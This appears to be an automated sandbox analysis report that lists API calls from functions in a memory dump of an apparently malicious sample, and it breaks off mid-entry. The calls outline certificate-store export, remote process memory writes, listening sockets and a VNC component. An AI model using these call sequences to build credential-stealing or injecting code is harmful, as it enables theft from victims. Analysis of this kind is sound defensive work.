Function 0280FFC2, Relevance: 12.1, APIs: 8, Instructions: 120

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,028123DE,?,?,?,00000000), ref: 0280FFCE
WaitForSingleObject.KERNEL32(?,00000000), ref: 02810009
CloseHandle.KERNEL32 ref: 0281001C

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

memcpy.MSVCRT ref: 0281003F
memset.MSVCRT ref: 02810059
memcpy.MSVCRT ref: 0281009F
memset.MSVCRT ref: 028100BD

Part of subcall function 02815B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,0280D091,?,?,00000000,0000EA60,00000000), ref: 02815B48
Part of subcall function 02815B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 02815B6C
Part of subcall function 02815B40: CloseHandle.KERNEL32 ref: 02815B7C
Part of subcall function 02815B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,0280D091,?,?,00000000,0000EA60,00000000), ref: 02815BAC

Part of subcall function 02815BB5: EnterCriticalSection.KERNEL32(02991F34,02991F28,?,00000001,0281E48F,00000000,0281E1B7,00000000,?,00000000,?,00000001,?,02824E98,?,00000001), ref: 02815BBE
Part of subcall function 02815BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 02815BF7
Part of subcall function 02815BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,0281E48F,00000000,00000000,00000002), ref: 02815C16
Part of subcall function 02815BB5: GetLastError.KERNEL32(?,000000FF,0281E48F,00000000,00000000,00000002,?,00000001,0281E48F,00000000,0281E1B7,00000000,?,00000000,?,00000001), ref: 02815C20
Part of subcall function 02815BB5: TerminateThread.KERNEL32 ref: 02815C28
Part of subcall function 02815BB5: CloseHandle.KERNEL32 ref: 02815C2F
Part of subcall function 02815BB5: LeaveCriticalSection.KERNEL32(02991F34,?,00000001,0281E48F,00000000,0281E1B7,00000000,?,00000000,?,00000001,?,02824E98,?,00000001), ref: 02815C44
Part of subcall function 02815BB5: ResumeThread.KERNEL32 ref: 02815C5D

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,028123DE,?,?,?,00000000), ref: 02810111

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280E35B, Relevance: 11.3, APIs: 6, Instructions: 129

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0280E376
PathAddBackslashW.SHLWAPI(?), ref: 0280E3A0

Part of subcall function 0283046D: EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
Part of subcall function 0283046D: LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

CreateDirectoryW.KERNEL32(?), ref: 0280E457
SetFileAttributesW.KERNEL32(?), ref: 0280E468
CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 0280E481
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 0280E492

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816240, Relevance: 11.0, APIs: 6, Instructions: 115

APIs

lstrlenA.KERNEL32(?,?), ref: 02816279
CreateMutexW.KERNEL32(02842974,00000001,?), ref: 028162D1
GetLastError.KERNEL32(?,?,?,?), ref: 028162E1
CloseHandle.KERNEL32 ref: 028162EF

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

memcpy.MSVCRT ref: 02816319
memcpy.MSVCRT ref: 0281632D

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 02815406: CreateThread.KERNEL32(00000000,00000000,028354A0,?), ref: 02815417
Part of subcall function 02815406: CloseHandle.KERNEL32 ref: 02815422

Part of subcall function 02812FB7: ReleaseMutex.KERNEL32 ref: 02812FBB
Part of subcall function 02812FB7: CloseHandle.KERNEL32 ref: 02812FC2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02811B16, Relevance: 10.9, APIs: 6, Instructions: 65

APIs

CreateFileW.KERNEL32(02991EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02811B2F
GetFileSizeEx.KERNEL32(?,?), ref: 02811B42
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02811B68
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 02811B80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 02811B9E
CloseHandle.KERNEL32 ref: 02811BA7

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282BBA1, Relevance: 10.9, APIs: 6, Instructions: 57

APIs

Part of subcall function 02824214: EnterCriticalSection.KERNEL32(02843510,?,02842DB4,00000000,00000006,?,0282BBC2,02842DB4,?,?,00000000), ref: 0282422E
Part of subcall function 02824214: LeaveCriticalSection.KERNEL32(02843510,?,02842DB4,00000000,00000006,?,0282BBC2,02842DB4,?,?,00000000), ref: 02824261
Part of subcall function 02824214: CoTaskMemFree.OLE32(00000000), ref: 028242F6
Part of subcall function 02824214: PathRemoveBackslashW.SHLWAPI(?), ref: 02824303
Part of subcall function 02824214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0282431A

PathRemoveBackslashW.SHLWAPI ref: 0282BBCD
PathRemoveFileSpecW.SHLWAPI ref: 0282BBDA
PathAddBackslashW.SHLWAPI ref: 0282BBEB
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 0282BBFE
CLSIDFromString.OLE32(?,02842DB4,?,?,00000064,?,?,?,?,?,00000064,?,02842DB4,?,?,00000000), ref: 0282BC1A
memset.MSVCRT ref: 0282BC2C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816D02, Relevance: 10.9, APIs: 6, Instructions: 39

APIs

socket.WS2_32(?,00000001,00000006), ref: 02816D0E
bind.WS2_32 ref: 02816D2B
listen.WS2_32(?,00000001), ref: 02816D38
WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,028315FC,?,?,?), ref: 02816D42
closesocket.WS2_32 ref: 02816D4B
WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,028315FC,?,?,?), ref: 02816D52

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02810C35, Relevance: 10.9, APIs: 6, Instructions: 197

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02810C9B
memcpy.MSVCRT ref: 02810CB5
VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 02810CC8
memset.MSVCRT ref: 02810D1F
memcpy.MSVCRT ref: 02810D33
VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 02810E22

Part of subcall function 02811149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 02811158

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282FA0A, Relevance: 10.8, APIs: 6, Instructions: 161

APIs

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,0280D004,00000000), ref: 0282FB0C

Part of subcall function 0282FE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,0282FB19,?,77C475F0,7C809F91,?,?,?,?,0280D004,00000000), ref: 0282FE4D
Part of subcall function 0282FE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,0282FB19,?,77C475F0,7C809F91,?,?,?,?,0280D004,00000000), ref: 0282FE84

Part of subcall function 0283046D: EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
Part of subcall function 0283046D: LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,0280D004,00000000), ref: 0282FB4D
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0282FB5C
SetEvent.KERNEL32 ref: 0282FB6C
GetExitCodeThread.KERNEL32(?,?), ref: 0282FB80
CloseHandle.KERNEL32 ref: 0282FB96

Part of subcall function 02815BB5: EnterCriticalSection.KERNEL32(02991F34,02991F28,?,00000001,0281E48F,00000000,0281E1B7,00000000,?,00000000,?,00000001,?,02824E98,?,00000001), ref: 02815BBE
Part of subcall function 02815BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 02815BF7
Part of subcall function 02815BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,0281E48F,00000000,00000000,00000002), ref: 02815C16
Part of subcall function 02815BB5: GetLastError.KERNEL32(?,000000FF,0281E48F,00000000,00000000,00000002,?,00000001,0281E48F,00000000,0281E1B7,00000000,?,00000000,?,00000001), ref: 02815C20
Part of subcall function 02815BB5: TerminateThread.KERNEL32 ref: 02815C28
Part of subcall function 02815BB5: CloseHandle.KERNEL32 ref: 02815C2F
Part of subcall function 02815BB5: LeaveCriticalSection.KERNEL32(02991F34,?,00000001,0281E48F,00000000,0281E1B7,00000000,?,00000000,?,00000001,?,02824E98,?,00000001), ref: 02815C44
Part of subcall function 02815BB5: ResumeThread.KERNEL32 ref: 02815C5D

Part of subcall function 028301B2: memcmp.MSVCRT ref: 028301CB
Part of subcall function 028301B2: memcmp.MSVCRT ref: 02830227
Part of subcall function 028301B2: memcmp.MSVCRT ref: 0283028D

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 02824CA0: memcpy.MSVCRT ref: 02824CC6
Part of subcall function 02824CA0: memset.MSVCRT ref: 02824D69

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280A150, Relevance: 10.8, APIs: 7, Instructions: 122

APIs

memcpy.MSVCRT ref: 0280A18C
memcpy.MSVCRT ref: 0280A1A1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 0280A1D3
memcpy.MSVCRT ref: 0280A209
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 0280A239
memcpy.MSVCRT ref: 0280A26F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 0280A29F

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028124AA, Relevance: 10.8, APIs: 6, Instructions: 91

APIs

CertOpenSystemStoreW.CRYPT32(00000000), ref: 028124BC
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 028124DA
CertEnumCertificatesInStore.CRYPT32(?,?,?,00000000), ref: 028124E7
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000), ref: 0281251B

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000,00000004,?,?,?,00000000), ref: 0281254D

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 0281258C: GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 028125BA
Part of subcall function 0281258C: GetSystemTime.KERNEL32(?), ref: 0281260D
Part of subcall function 0281258C: CharLowerW.USER32(?), ref: 0281265D
Part of subcall function 0281258C: PathRenameExtensionW.SHLWAPI(?,?), ref: 0281268D

CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 0281257C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02832D0B, Relevance: 10.7, APIs: 6, Instructions: 64

APIs

accept.WS2_32(?,0000EA60), ref: 02832D2C
WSAEventSelect.WS2_32(?,00000000,00000000), ref: 02832D3E

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,0280D163), ref: 02832D95

Part of subcall function 02832917: WSACreateEvent.WS2_32(00000000,?,02832C15,?,00000000,?,02832CD1,?,?,?,?,00000000), ref: 0283292D
Part of subcall function 02832917: WSAEventSelect.WS2_32(?,?,02832CD1), ref: 02832943
Part of subcall function 02832917: WSACloseEvent.WS2_32(?), ref: 02832957

Part of subcall function 02832855: getsockopt.WS2_32(0000EA60,0000FFFF,00002004,?,?), ref: 0283288F
Part of subcall function 02832855: memset.MSVCRT ref: 028328A3

WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,0280D163,?), ref: 02832D6F
shutdown.WS2_32(?,00000002), ref: 02832D87
closesocket.WS2_32 ref: 02832D8E

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816378, Relevance: 10.6, APIs: 7, Instructions: 146

APIs

Part of subcall function 0281568C: TlsSetValue.KERNEL32(00000001,0281E1BD), ref: 02815699

Part of subcall function 0282BEE3: CreateMutexW.KERNEL32(02842974,00000000,?), ref: 0282BF05

GetCurrentThread.KERNEL32 ref: 028163A4
SetThreadPriority.KERNEL32 ref: 028163AB

Part of subcall function 02824B8D: WaitForSingleObject.KERNEL32(00000000,0281E1D7), ref: 02824B95

memset.MSVCRT ref: 028163ED
lstrlenA.KERNEL32(00000050), ref: 02816404

Part of subcall function 02815D25: memset.MSVCRT ref: 02815D35

Part of subcall function 02820A9A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02820AD8
Part of subcall function 02820A9A: PathRemoveFileSpecW.SHLWAPI(?), ref: 02820B26
Part of subcall function 02820A9A: FindFirstFileW.KERNEL32(?,?), ref: 02820B93
Part of subcall function 02820A9A: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02820BEA
Part of subcall function 02820A9A: SetLastError.KERNEL32(00000057,?), ref: 02820C5B
Part of subcall function 02820A9A: CloseHandle.KERNEL32 ref: 02820C95
Part of subcall function 02820A9A: FindNextFileW.KERNEL32(?,?), ref: 02820CC9
Part of subcall function 02820A9A: FindClose.KERNEL32 ref: 02820CF3

memset.MSVCRT ref: 028164CA
memcpy.MSVCRT ref: 028164DA

Part of subcall function 02816240: lstrlenA.KERNEL32(?,?), ref: 02816279
Part of subcall function 02816240: CreateMutexW.KERNEL32(02842974,00000001,?), ref: 028162D1
Part of subcall function 02816240: GetLastError.KERNEL32(?,?,?,?), ref: 028162E1
Part of subcall function 02816240: CloseHandle.KERNEL32 ref: 028162EF
Part of subcall function 02816240: memcpy.MSVCRT ref: 02816319
Part of subcall function 02816240: memcpy.MSVCRT ref: 0281632D

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

WaitForSingleObject.KERNEL32(00007530), ref: 02816504

Part of subcall function 02812FB7: ReleaseMutex.KERNEL32 ref: 02812FBB
Part of subcall function 02812FB7: CloseHandle.KERNEL32 ref: 02812FC2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281DEBB, Relevance: 10.6, APIs: 3, Strings: 2, Instructions: 27

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 0281DEC9
GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 0281DED5
SetLastError.KERNEL32(00000001,028242C8,02842954,?,02842DB4,00000000,00000006,?,0282BBC2,02842DB4,?,?,00000000), ref: 0281DEED

Strings

shell32.dll, xrefs: 0281DEC8
SHGetKnownFolderPath, xrefs: 0281DED3

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028179B9, Relevance: 10.6, APIs: 7, Instructions: 126

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 028179F0
WSASetLastError.WS2_32(00000008), ref: 028179FF
memcpy.MSVCRT ref: 02817A1C
memcpy.MSVCRT ref: 02817A2E
WSASetLastError.WS2_32(00000008,?,?,?), ref: 02817A98
WSAGetLastError.WS2_32(?,?,?), ref: 02817AB4

Part of subcall function 02817CDE: InterlockedIncrement.KERNEL32(?,?,00000000), ref: 02817D2F
Part of subcall function 02817CDE: RegisterWaitForSingleObject.KERNEL32(?,?,02817B1D,?,000000FF,00000004), ref: 02817D43

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?), ref: 02817ADD

Part of subcall function 0280F9C5: memcpy.MSVCRT ref: 0280F9DA
Part of subcall function 0280F9C5: SetEvent.KERNEL32 ref: 0280F9EA

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02815208, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60

APIs

memset.MSVCRT ref: 02815229
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 02815261
memcpy.MSVCRT ref: 0281527C
CloseHandle.KERNEL32(?), ref: 02815291
CloseHandle.KERNEL32(?), ref: 02815297

Strings

D, xrefs: 02815232

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02819895, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49

APIs

CloseHandle.KERNEL32 ref: 0281989F
GetSystemTimeAsFileTime.KERNEL32(?), ref: 028198AD

Part of subcall function 0280E6AF: GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 0280E6BC
Part of subcall function 0280E6AF: CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 0280E6DC

memcpy.MSVCRT ref: 028198E8
lstrcpyW.KERNEL32(?,?), ref: 028198FD

Part of subcall function 0282B9D8: PathIsDirectoryW.SHLWAPI(?), ref: 0282BA0E
Part of subcall function 0282B9D8: CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 0282BA30
Part of subcall function 0282B9D8: GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 0282BA76
Part of subcall function 0282B9D8: CloseHandle.KERNEL32 ref: 0282BA95
Part of subcall function 0282B9D8: PathRemoveFileSpecW.SHLWAPI ref: 0282BAA2

CloseHandle.KERNEL32 ref: 02819916

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 028198B3

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280A5B2, Relevance: 10.5, APIs: 4, Strings: 1, Instructions: 293

APIs

Part of subcall function 0282BEE3: CreateMutexW.KERNEL32(02842974,00000000,?), ref: 0282BF05

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

Part of subcall function 02811B16: CreateFileW.KERNEL32(02991EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02811B2F
Part of subcall function 02811B16: GetFileSizeEx.KERNEL32(?,?), ref: 02811B42
Part of subcall function 02811B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02811B68
Part of subcall function 02811B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 02811B80
Part of subcall function 02811B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 02811B9E
Part of subcall function 02811B16: CloseHandle.KERNEL32 ref: 02811BA7

memset.MSVCRT ref: 0280A757
memcpy.MSVCRT ref: 0280A780

Part of subcall function 0282D95F: GetSystemTime.KERNEL32(?), ref: 0282D969

Part of subcall function 028169C9: HeapAlloc.KERNEL32(00000000,?,?,02834E9D,02809851,?,?,02834FB1,?,?,?,?,?,?,?,?), ref: 028169F3
Part of subcall function 028169C9: HeapReAlloc.KERNEL32(00000000,?,?,?,02834E9D,02809851,?,?,02834FB1,?,?,?,?,?,?), ref: 02816A06

Part of subcall function 02833993: memcpy.MSVCRT ref: 02833AA4

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0280A885
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0280A8A1

Part of subcall function 0280E348: CloseHandle.KERNEL32 ref: 0280E354

Part of subcall function 02812FB7: ReleaseMutex.KERNEL32 ref: 02812FBB
Part of subcall function 02812FB7: CloseHandle.KERNEL32 ref: 02812FC2

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 0280A46D: memset.MSVCRT ref: 0280A47C
Part of subcall function 0280A46D: memset.MSVCRT ref: 0280A4BF
Part of subcall function 0280A46D: memset.MSVCRT ref: 0280A4F5

Part of subcall function 02811149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 02811158

Part of subcall function 02810C35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02810C9B
Part of subcall function 02810C35: memcpy.MSVCRT ref: 02810CB5
Part of subcall function 02810C35: VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 02810CC8
Part of subcall function 02810C35: memset.MSVCRT ref: 02810D1F
Part of subcall function 02810C35: memcpy.MSVCRT ref: 02810D33
Part of subcall function 02810C35: VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 02810E22

Part of subcall function 02833B9E: memcmp.MSVCRT ref: 02833C47

Part of subcall function 02811BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 02811BC6
Part of subcall function 02811BB5: CloseHandle.KERNEL32 ref: 02811BD5

Strings

vnc, xrefs: 0280A601 0280A60E

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02835419, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 46

APIs

LoadLibraryW.KERNEL32(urlmon.dll), ref: 02835420
GetProcAddress.KERNEL32(?,ObtainUserAgentString), ref: 02835436
FreeLibrary.KERNEL32 ref: 02835481

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Strings

urlmon.dll, xrefs: 0283541B
ObtainUserAgentString, xrefs: 0283542E

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281DEFC, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 40

APIs

EnterCriticalSection.KERNEL32(02843510,?,00000000,?,02824659,?,028249A5,?,?,00000001), ref: 0281DF10
LeaveCriticalSection.KERNEL32(02843510,?,00000000,?,02824659,?,028249A5,?,?,00000001), ref: 0281DF38

Part of subcall function 0281DEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 0281DEC9
Part of subcall function 0281DEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 0281DED5
Part of subcall function 0281DEBB: SetLastError.KERNEL32(00000001,028242C8,02842954,?,02842DB4,00000000,00000006,?,0282BBC2,02842DB4,?,?,00000000), ref: 0281DEED

IsWow64Process.KERNEL32(000000FF,?), ref: 0281DF61

Strings

IsWow64Process, xrefs: 0281DF44
kernel32.dll, xrefs: 0281DF49

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816997, Relevance: 9.8, APIs: 1, Instructions: 9

APIs

Part of subcall function 0281692C: EnterCriticalSection.KERNEL32(02843510,00000024,0281699F,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 0281693C
Part of subcall function 0281692C: LeaveCriticalSection.KERNEL32(02843510,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 02816966

HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02823C8C, Relevance: 9.6, APIs: 5, Instructions: 138

APIs

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

FindFirstFileW.KERNEL32(?,?), ref: 02823CCB
SetLastError.KERNEL32(?,?,?,?), ref: 02823DF6

Part of subcall function 02823E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 02823E98
Part of subcall function 02823E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 02823EB7

FindNextFileW.KERNEL32(?,?), ref: 02823DC0
GetLastError.KERNEL32(?,?), ref: 02823DD9
FindClose.KERNEL32 ref: 02823DEF

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280DE64, Relevance: 9.5, APIs: 6, Instructions: 88

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,0280E138,?,?,?,?,?,00000009,00000000), ref: 0280DE7E
LeaveCriticalSection.KERNEL32 ref: 0280DF65

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

memcpy.MSVCRT ref: 0280DEEF
memcpy.MSVCRT ref: 0280DF13
memcpy.MSVCRT ref: 0280DF2A
memcpy.MSVCRT ref: 0280DF4A

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028330A2, Relevance: 9.5, APIs: 5, Instructions: 71

APIs

Part of subcall function 02832755: EnterCriticalSection.KERNEL32(02843510,?,028330AF,?,?,00000000), ref: 02832765
Part of subcall function 02832755: LeaveCriticalSection.KERNEL32(02843510,?,00000000), ref: 0283278F

socket.WS2_32(?,00000002,00000000), ref: 028330BC
WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 028330EF
WSAGetLastError.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 028330F6

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,?,?,00000000,00000000), ref: 0283312A

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

closesocket.WS2_32 ref: 0283313A

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028244FB, Relevance: 9.5, APIs: 5, Instructions: 59

APIs

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

FindFirstFileW.KERNEL32(?,?), ref: 0282452C

Part of subcall function 0280E826: SetFileAttributesW.KERNEL32(?,00000080), ref: 0280E82F
Part of subcall function 0280E826: DeleteFileW.KERNEL32(?), ref: 0280E836

FindNextFileW.KERNEL32(?,?), ref: 0282457E
FindClose.KERNEL32 ref: 02824589
SetFileAttributesW.KERNEL32(?,00000080), ref: 02824595
RemoveDirectoryW.KERNEL32(?), ref: 0282459C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02824A6B, Relevance: 9.4, APIs: 5, Instructions: 109

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 02824A89

Part of subcall function 02824159: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 02824188
Part of subcall function 02824159: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 028241C7
Part of subcall function 02824159: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 028241EE

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 02824AC4
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02824B04
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02824B27

Part of subcall function 028245AE: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 028245D1
Part of subcall function 028245AE: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 028245E9
Part of subcall function 028245AE: DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 02824604

